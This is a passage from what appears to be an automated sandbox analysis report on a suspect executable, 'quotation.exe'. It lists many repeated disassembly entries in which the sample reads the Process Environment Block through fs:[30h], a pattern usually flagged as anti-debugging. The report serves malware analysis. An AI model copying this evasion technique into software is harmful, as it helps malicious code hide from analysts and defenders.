                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01352000 mov eax, dword ptr fs:[00000030h]3_2_01352000
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE016 mov eax, dword ptr fs:[00000030h]3_2_012CE016
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE016 mov eax, dword ptr fs:[00000030h]3_2_012CE016
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE016 mov eax, dword ptr fs:[00000030h]3_2_012CE016
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE016 mov eax, dword ptr fs:[00000030h]3_2_012CE016
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DC073 mov eax, dword ptr fs:[00000030h]3_2_012DC073
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336050 mov eax, dword ptr fs:[00000030h]3_2_01336050
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2050 mov eax, dword ptr fs:[00000030h]3_2_012B2050
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A80A0 mov eax, dword ptr fs:[00000030h]3_2_012A80A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013760B8 mov eax, dword ptr fs:[00000030h]3_2_013760B8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013760B8 mov ecx, dword ptr fs:[00000030h]3_2_013760B8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013480A8 mov eax, dword ptr fs:[00000030h]3_2_013480A8
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B208A mov eax, dword ptr fs:[00000030h]3_2_012B208A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B80E9 mov eax, dword ptr fs:[00000030h]3_2_012B80E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA0E3 mov ecx, dword ptr fs:[00000030h]3_2_012AA0E3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013360E0 mov eax, dword ptr fs:[00000030h]3_2_013360E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC0F0 mov eax, dword ptr fs:[00000030h]3_2_012AC0F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F20F0 mov ecx, dword ptr fs:[00000030h]3_2_012F20F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013320DE mov eax, dword ptr fs:[00000030h]3_2_013320DE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01388324 mov eax, dword ptr fs:[00000030h]3_2_01388324
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01388324 mov ecx, dword ptr fs:[00000030h]3_2_01388324
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01388324 mov eax, dword ptr fs:[00000030h]3_2_01388324
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01388324 mov eax, dword ptr fs:[00000030h]3_2_01388324
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA30B mov eax, dword ptr fs:[00000030h]3_2_012EA30B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA30B mov eax, dword ptr fs:[00000030h]3_2_012EA30B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA30B mov eax, dword ptr fs:[00000030h]3_2_012EA30B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC310 mov ecx, dword ptr fs:[00000030h]3_2_012AC310
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D0310 mov ecx, dword ptr fs:[00000030h]3_2_012D0310
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135437C mov eax, dword ptr fs:[00000030h]3_2_0135437C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137A352 mov eax, dword ptr fs:[00000030h]3_2_0137A352
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01358350 mov ecx, dword ptr fs:[00000030h]3_2_01358350
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov eax, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov eax, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov eax, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov ecx, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov eax, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133035C mov eax, dword ptr fs:[00000030h]3_2_0133035C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0138634F mov eax, dword ptr fs:[00000030h]3_2_0138634F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01332349 mov eax, dword ptr fs:[00000030h]3_2_01332349
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE388 mov eax, dword ptr fs:[00000030h]3_2_012AE388
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE388 mov eax, dword ptr fs:[00000030h]3_2_012AE388
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE388 mov eax, dword ptr fs:[00000030h]3_2_012AE388
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D438F mov eax, dword ptr fs:[00000030h]3_2_012D438F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D438F mov eax, dword ptr fs:[00000030h]3_2_012D438F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8397 mov eax, dword ptr fs:[00000030h]3_2_012A8397
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8397 mov eax, dword ptr fs:[00000030h]3_2_012A8397
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8397 mov eax, dword ptr fs:[00000030h]3_2_012A8397
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C03E9 mov eax, dword ptr fs:[00000030h]3_2_012C03E9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E63FF mov eax, dword ptr fs:[00000030h]3_2_012E63FF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE3F0 mov eax, dword ptr fs:[00000030h]3_2_012CE3F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE3F0 mov eax, dword ptr fs:[00000030h]3_2_012CE3F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE3F0 mov eax, dword ptr fs:[00000030h]3_2_012CE3F0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013543D4 mov eax, dword ptr fs:[00000030h]3_2_013543D4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013543D4 mov eax, dword ptr fs:[00000030h]3_2_013543D4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA3C0 mov eax, dword ptr fs:[00000030h]3_2_012BA3C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B83C0 mov eax, dword ptr fs:[00000030h]3_2_012B83C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov ecx, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135E3DB mov eax, dword ptr fs:[00000030h]3_2_0135E3DB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013363C0 mov eax, dword ptr fs:[00000030h]3_2_013363C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136C3CD mov eax, dword ptr fs:[00000030h]3_2_0136C3CD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A823B mov eax, dword ptr fs:[00000030h]3_2_012A823B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A826B mov eax, dword ptr fs:[00000030h]3_2_012A826B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01360274 mov eax, dword ptr fs:[00000030h]3_2_01360274
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4260 mov eax, dword ptr fs:[00000030h]3_2_012B4260
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0138625D mov eax, dword ptr fs:[00000030h]3_2_0138625D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A250 mov eax, dword ptr fs:[00000030h]3_2_0136A250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A250 mov eax, dword ptr fs:[00000030h]3_2_0136A250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01338243 mov eax, dword ptr fs:[00000030h]3_2_01338243
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01338243 mov ecx, dword ptr fs:[00000030h]3_2_01338243
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6259 mov eax, dword ptr fs:[00000030h]3_2_012B6259
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AA250 mov eax, dword ptr fs:[00000030h]3_2_012AA250
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02A0 mov eax, dword ptr fs:[00000030h]3_2_012C02A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02A0 mov eax, dword ptr fs:[00000030h]3_2_012C02A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov ecx, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013462A0 mov eax, dword ptr fs:[00000030h]3_2_013462A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE284 mov eax, dword ptr fs:[00000030h]3_2_012EE284
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE284 mov eax, dword ptr fs:[00000030h]3_2_012EE284
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330283 mov eax, dword ptr fs:[00000030h]3_2_01330283
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C02E1 mov eax, dword ptr fs:[00000030h]3_2_012C02E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA2C3 mov eax, dword ptr fs:[00000030h]3_2_012BA2C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013862D6 mov eax, dword ptr fs:[00000030h]3_2_013862D6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE53E mov eax, dword ptr fs:[00000030h]3_2_012DE53E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0535 mov eax, dword ptr fs:[00000030h]3_2_012C0535
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346500 mov eax, dword ptr fs:[00000030h]3_2_01346500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384500 mov eax, dword ptr fs:[00000030h]3_2_01384500
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E656A mov eax, dword ptr fs:[00000030h]3_2_012E656A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8550 mov eax, dword ptr fs:[00000030h]3_2_012B8550
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8550 mov eax, dword ptr fs:[00000030h]3_2_012B8550
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013305A7 mov eax, dword ptr fs:[00000030h]3_2_013305A7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D45B1 mov eax, dword ptr fs:[00000030h]3_2_012D45B1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D45B1 mov eax, dword ptr fs:[00000030h]3_2_012D45B1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E4588 mov eax, dword ptr fs:[00000030h]3_2_012E4588
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2582 mov eax, dword ptr fs:[00000030h]3_2_012B2582
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B2582 mov ecx, dword ptr fs:[00000030h]3_2_012B2582
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE59C mov eax, dword ptr fs:[00000030h]3_2_012EE59C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC5ED mov eax, dword ptr fs:[00000030h]3_2_012EC5ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC5ED mov eax, dword ptr fs:[00000030h]3_2_012EC5ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE5E7 mov eax, dword ptr fs:[00000030h]3_2_012DE5E7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B25E0 mov eax, dword ptr fs:[00000030h]3_2_012B25E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE5CF mov eax, dword ptr fs:[00000030h]3_2_012EE5CF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE5CF mov eax, dword ptr fs:[00000030h]3_2_012EE5CF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B65D0 mov eax, dword ptr fs:[00000030h]3_2_012B65D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA5D0 mov eax, dword ptr fs:[00000030h]3_2_012EA5D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA5D0 mov eax, dword ptr fs:[00000030h]3_2_012EA5D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AE420 mov eax, dword ptr fs:[00000030h]3_2_012AE420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012AC427 mov eax, dword ptr fs:[00000030h]3_2_012AC427
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01336420 mov eax, dword ptr fs:[00000030h]3_2_01336420
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA430 mov eax, dword ptr fs:[00000030h]3_2_012EA430
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8402 mov eax, dword ptr fs:[00000030h]3_2_012E8402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C460 mov ecx, dword ptr fs:[00000030h]3_2_0133C460
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DA470 mov eax, dword ptr fs:[00000030h]3_2_012DA470
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A456 mov eax, dword ptr fs:[00000030h]3_2_0136A456
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EE443 mov eax, dword ptr fs:[00000030h]3_2_012EE443
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A645D mov eax, dword ptr fs:[00000030h]3_2_012A645D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D245A mov eax, dword ptr fs:[00000030h]3_2_012D245A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B64AB mov eax, dword ptr fs:[00000030h]3_2_012B64AB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133A4B0 mov eax, dword ptr fs:[00000030h]3_2_0133A4B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E44B0 mov ecx, dword ptr fs:[00000030h]3_2_012E44B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0136A49A mov eax, dword ptr fs:[00000030h]3_2_0136A49A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B04E5 mov ecx, dword ptr fs:[00000030h]3_2_012B04E5
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132C730 mov eax, dword ptr fs:[00000030h]3_2_0132C730
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC720 mov eax, dword ptr fs:[00000030h]3_2_012EC720
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC720 mov eax, dword ptr fs:[00000030h]3_2_012EC720
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov eax, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov ecx, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E273C mov eax, dword ptr fs:[00000030h]3_2_012E273C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC700 mov eax, dword ptr fs:[00000030h]3_2_012EC700
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0710 mov eax, dword ptr fs:[00000030h]3_2_012B0710
